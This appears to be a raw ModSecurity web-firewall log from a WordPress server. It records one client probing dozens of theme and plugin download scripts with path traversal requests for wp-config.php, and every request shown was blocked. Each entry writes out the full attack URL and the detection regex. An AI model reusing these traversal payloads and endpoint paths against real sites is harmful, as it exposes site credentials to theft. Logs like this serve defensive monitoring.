"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/endlesshorizon/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/endlesshorizon/download.php"] [unique_id "Y8DxEsx9A9c0KkSpLadQCwAAAI4"] [Fri Jan 13 00:50:10.324298 2023] [:error] [pid 31041:tid 140315306489600] [client 185.206.224.212:42886] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "Y8DxEsPRCDYHCWWhHpAjrgAAAAM"] [Fri Jan 13 00:50:10.439652 2023] [:error] [pid 31476:tid 140315281311488] [client 185.206.224.212:42888] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/NativeChurch/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "Y8DxEqGMrWzzUVMdEhcL0gAAAMY"] [Fri Jan 13 00:50:10.555896 2023] [:error] [pid 31476:tid 140315197384448] [client 185.206.224.212:42890] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/estrutura-basica/scripts/download.php?arquivo=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/estrutura-basica/scripts/download.php"] [unique_id "Y8DxEqGMrWzzUVMdEhcL0wAAANA"] [Fri Jan 13 00:50:10.670953 2023] [:error] [pid 31476:tid 140315388712704] [client 185.206.224.212:42892] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/zip-attachments/download.php?za_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "Y8DxEqGMrWzzUVMdEhcL1AAAAMI"] [Fri Jan 13 00:50:11.508553 2023] [:error] [pid 31476:tid 140315256133376] [client 185.206.224.212:42900] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "Y8DxE6GMrWzzUVMdEhcL1gAAAMk"] [Fri Jan 13 00:50:12.447817 2023] [:error] [pid 31476:tid 140315180599040] [client 185.206.224.212:42908] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php"] [unique_id "Y8DxFKGMrWzzUVMdEhcL2AAAANI"] [Fri Jan 13 00:50:12.573777 2023] [:error] [pid 31043:tid 140315264526080] [client 185.206.224.212:42910] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/authentic/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/authentic/includes/download.php"] [unique_id "Y8DxFMx9A9c0KkSpLadQDQAAAIg"] [Fri Jan 13 00:50:12.688531 2023] [:error] [pid 31476:tid 140315163813632] [client 185.206.224.212:42912] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/acento/includes/view-pdf.php?download=1&file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/acento/includes/view-pdf.php"] [unique_id "Y8DxFKGMrWzzUVMdEhcL2QAAANQ"] [Fri Jan 13 00:50:12.812611 2023] [:error] [pid 31476:tid 140315289704192] [client 185.206.224.212:42914] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/fiestaresidences/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/fiestaresidences/download.php"] [unique_id "Y8DxFKGMrWzzUVMdEhcL2gAAAMU"] [Fri Jan 13 00:50:12.935616 2023] [:error] [pid 31043:tid 140315180599040] [client 185.206.224.212:42916] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/optimus/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/optimus/download.php"] [unique_id "Y8DxFMx9A9c0KkSpLadQDgAAAJI"] [Fri Jan 13 00:50:13.052745 2023] [:error] [pid 31041:tid 140315256133376] [client 185.206.224.212:42918] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/erinvale/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/erinvale/download.php"] [unique_id "Y8DxFcPRCDYHCWWhHpAjrwAAAAk"] [Fri Jan 13 00:50:13.171671 2023] [:error] [pid 31476:tid 140315130242816] [client 185.206.224.212:42920] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/hsv/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/hsv/download.php"] [unique_id "Y8DxFaGMrWzzUVMdEhcL2wAAANg"] [Fri Jan 13 00:50:13.287344 2023] [:error] [pid 31041:tid 140315205777152] [client 185.206.224.212:42922] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/SMWF/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/SMWF/inc/download.php"] [unique_id "Y8DxFcPRCDYHCWWhHpAjsAAAAA8"] [Fri Jan 13 00:50:13.404327 2023] [:error] [pid 31476:tid 140315155420928] [client 185.206.224.212:42924] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/markant/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/markant/download.php"] [unique_id "Y8DxFaGMrWzzUVMdEhcL3AAAANU"] [Fri Jan 13 00:50:13.530190 2023] [:error] [pid 31043:tid 140315298096896] [client 185.206.224.212:42926] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/yakimabait/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/yakimabait/download.php"] [unique_id "Y8DxFcx9A9c0KkSpLadQDwAAAIQ"] [Fri Jan 13 00:50:13.644979 2023] [:error] [pid 31042:tid 140315281311488] [client 185.206.224.212:42928] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/TheLoft/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/TheLoft/download.php"] [unique_id "Y8DxFY6vAq65Ygpdg5ObOwAAAEY"] [Fri Jan 13 00:50:13.760292 2023] [:error] [pid 31043:tid 140315222562560] [client 185.206.224.212:42930] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/felis/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/felis/download.php"] [unique_id "Y8DxFcx9A9c0KkSpLadQEAAAAI0"] [Fri Jan 13 00:50:13.876733 2023] [:error] [pid 31476:tid 140315188991744] [client 185.206.224.212:42932] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/MichaelCanthony/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/MichaelCanthony/download.php"] [unique_id "Y8DxFaGMrWzzUVMdEhcL3QAAANE"] [Fri Jan 13 00:50:14.016126 2023] [:error] [pid 31043:tid 140315247740672] [client 185.206.224.212:42934] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/trinity/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/trinity/lib/scripts/download.php"] [unique_id "Y8DxFsx9A9c0KkSpLadQEQAAAIo"] [Fri Jan 13 00:50:14.130636 2023] [:error] [pid 31042:tid 140315272918784] [client 185.206.224.212:42936] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/epic/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/epic/includes/download.php"] [unique_id "Y8DxFo6vAq65Ygpdg5ObPAAAAEc"] [Fri Jan 13 00:50:14.246731 2023] [:error] [pid 31043:tid 140315397105408] [client 185.206.224.212:42938] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/urbancity/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/urbancity/lib/scripts/download.php"] [unique_id "Y8DxFsx9A9c0KkSpLadQEgAAAIE"] [Fri Jan 13 00:50:14.363968 2023] [:error] [pid 31476:tid 140315172206336] [client 185.206.224.212:42940] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data 